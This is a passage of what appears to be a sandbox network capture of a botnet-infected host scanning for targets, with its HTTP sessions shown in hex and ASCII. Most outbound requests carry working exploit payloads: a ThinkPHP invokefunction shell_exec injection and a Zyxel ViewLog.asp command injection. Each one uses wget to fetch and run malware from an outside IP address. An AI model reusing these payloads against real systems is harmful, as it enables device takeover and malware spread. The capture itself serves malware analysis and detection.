                                                              Nov 13, 2023 22:18:45.159524918 CET5630INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                              Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Tue, 14 Nov 2023 06:18:45 GMTServer: nawsd/1.0.1-20211228X-Frame-Options: SAMEORIGIN


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              234192.168.2.2355350112.74.188.2780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:44.453699112 CET5517OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:44.778850079 CET5552INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:44 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              235192.168.2.235159294.23.220.2148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.112787962 CET5626OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.413821936 CET5635INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:45 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              236192.168.2.235247885.219.206.2098080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.127023935 CET5627OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              237192.168.2.233481494.110.111.838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.129188061 CET5628OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              238192.168.2.233813085.122.227.1538080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.387114048 CET5634OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              239192.168.2.235602062.221.134.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.727246046 CET5700OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.439296007 CET5879OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.791423082 CET5977INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:18:47 GMT
                                                              Server: Boa/0.94.14rc21
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              24192.168.2.234458294.33.127.2338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:10.905478954 CET1523OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              240192.168.2.234192262.29.83.2228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.727969885 CET5700OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.503274918 CET5880OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:49.679003000 CET6134OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:54.030421019 CET6715OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:02.477479935 CET7699OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.139034986 CET9914OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.950495958 CET14256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              241192.168.2.235621294.101.207.1348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.728259087 CET5701OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:46.171443939 CET5757OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.538772106 CET5881INHTTP/1.1
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              242192.168.2.235094494.121.71.1568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:45.731806993 CET5702OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              243192.168.2.233731495.100.76.13580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.082930088 CET5752OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:46.377456903 CET5760INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:18:46 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:46 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 35 37 61 37 62 35 63 26 23 34 36 3b 31 36 39 39 39 31 30 33 32 36 26 23 34 36 3b 64 32 36 35 31 33 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a57a7b5c&#46;1699910326&#46;d265133</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              244192.168.2.233791431.136.85.148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.137274027 CET5754OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:49.167107105 CET6121OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:55.310307980 CET6847OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:07.340753078 CET8327OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:32.425406933 CET11375OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:21.571039915 CET17554OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
